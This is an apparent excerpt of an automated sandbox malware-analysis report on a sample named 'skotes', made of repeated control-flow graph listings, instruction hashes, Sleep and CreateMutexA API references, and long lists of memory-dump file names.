                                                                                                                                                                                                                                          • Opcode ID: 44af20d14b7d2200ac3fa81b00fb73397aae2bc0d2af3336d673fc8d4b82043a
                                                                                                                                                                                                                                          • Instruction ID: e402edb3f6758ec8cf98865e565fa87cfe21737b707ec6ad5e7f1251134e14b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44af20d14b7d2200ac3fa81b00fb73397aae2bc0d2af3336d673fc8d4b82043a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D313B316041049BEB18AB78DC9576DB7E2EBC6310F24C6A9E02CDB3D5D735A980C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 56 b7a079-b7a099 60 b7a0c7-b7a0e3 56->60 61 b7a09b-b7a0a7 56->61 62 b7a0e5-b7a0f1 60->62 63 b7a111-b7a130 60->63 64 b7a0bd-b7a0c4 call b8d663 61->64 65 b7a0a9-b7a0b7 61->65 68 b7a107-b7a10e call b8d663 62->68 69 b7a0f3-b7a101 62->69 70 b7a132-b7a13e 63->70 71 b7a15e-b7a916 call b880c0 63->71 64->60 65->64 66 b7a930 65->66 74 b7a953-b7a994 Sleep CreateMutexA 66->74 75 b7a930 call ba6c6a 66->75 68->63 69->66 69->68 77 b7a154-b7a15b call b8d663 70->77 78 b7a140-b7a14e 70->78 85 b7a9a7-b7a9a8 74->85 86 b7a996-b7a998 74->86 75->74 77->71 78->66 78->77 86->85 88 b7a99a-b7a9a5 86->88 88->85
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 89eec3e9283b41942a0c9aff9b34a4715c3e87e850bf3fb622c29d4c9ac40081
                                                                                                                                                                                                                                          • Instruction ID: 0811744585c95675b1eaf580b2e45e953dbc288e239a578a075e648a78b3794a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89eec3e9283b41942a0c9aff9b34a4715c3e87e850bf3fb622c29d4c9ac40081
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB312A316141049BEB489B78DCC576DB7E2DBC6314F24C6A9E02CE77D5D7369980C712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 90 b7a1ae-b7a1ce 94 b7a1d0-b7a1dc 90->94 95 b7a1fc-b7a218 90->95 98 b7a1f2-b7a1f9 call b8d663 94->98 99 b7a1de-b7a1ec 94->99 96 b7a246-b7a265 95->96 97 b7a21a-b7a226 95->97 102 b7a267-b7a273 96->102 103 b7a293-b7a916 call b880c0 96->103 100 b7a23c-b7a243 call b8d663 97->100 101 b7a228-b7a236 97->101 98->95 99->98 104 b7a935 99->104 100->96 101->100 101->104 107 b7a275-b7a283 102->107 108 b7a289-b7a290 call b8d663 102->108 110 b7a953-b7a994 Sleep CreateMutexA 104->110 111 b7a935 call ba6c6a 104->111 107->104 107->108 108->103 119 b7a9a7-b7a9a8 110->119 120 b7a996-b7a998 110->120 111->110 120->119 122 b7a99a-b7a9a5 120->122 122->119
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 7a83056f1db68cf6ac0deaface2fe4cb709ddd824884c9ca7b78bcfbc5191627
                                                                                                                                                                                                                                          • Instruction ID: 63d941035cfe0b9db549682c1d679518eb7857ac8844649f63a0cfbba9cd834a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a83056f1db68cf6ac0deaface2fe4cb709ddd824884c9ca7b78bcfbc5191627
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8312A31A041049BFB48AB78DCC975DBBE2EBC6310F2482A9E028A73D2D7359980C712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 124 b7a418-b7a438 128 b7a466-b7a482 124->128 129 b7a43a-b7a446 124->129 132 b7a484-b7a490 128->132 133 b7a4b0-b7a4cf 128->133 130 b7a45c-b7a463 call b8d663 129->130 131 b7a448-b7a456 129->131 130->128 131->130 134 b7a93f-b7a994 call ba6c6a * 4 Sleep CreateMutexA 131->134 136 b7a4a6-b7a4ad call b8d663 132->136 137 b7a492-b7a4a0 132->137 138 b7a4d1-b7a4dd 133->138 139 b7a4fd-b7a916 call b880c0 133->139 160 b7a9a7-b7a9a8 134->160 161 b7a996-b7a998 134->161 136->133 137->134 137->136 144 b7a4f3-b7a4fa call b8d663 138->144 145 b7a4df-b7a4ed 138->145 144->139 145->134 145->144 161->160 162 b7a99a-b7a9a5 161->162 162->160
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 20e8ef536ac48a51dea398ecee2f112fa3d842e730bf9872dc8161996c36f75d
                                                                                                                                                                                                                                          • Instruction ID: f895c76e283406badc229bed02aa1e172df8bfca611a90bfe4d6bf254bf1e202
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e8ef536ac48a51dea398ecee2f112fa3d842e730bf9872dc8161996c36f75d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC314E316041049BEB18AB78DCC9B6DB7E2EFC6324F24C299E068D73D5E77699808753

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 164 b7a54d-b7a56d 168 b7a56f-b7a57b 164->168 169 b7a59b-b7a5b7 164->169 172 b7a591-b7a598 call b8d663 168->172 173 b7a57d-b7a58b 168->173 170 b7a5e5-b7a604 169->170 171 b7a5b9-b7a5c5 169->171 176 b7a606-b7a612 170->176 177 b7a632-b7a916 call b880c0 170->177 174 b7a5c7-b7a5d5 171->174 175 b7a5db-b7a5e2 call b8d663 171->175 172->169 173->172 178 b7a944-b7a994 call ba6c6a * 3 Sleep CreateMutexA 173->178 174->175 174->178 175->170 182 b7a614-b7a622 176->182 183 b7a628-b7a62f call b8d663 176->183 198 b7a9a7-b7a9a8 178->198 199 b7a996-b7a998 178->199 182->178 182->183 183->177 199->198 200 b7a99a-b7a9a5 199->200 200->198
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
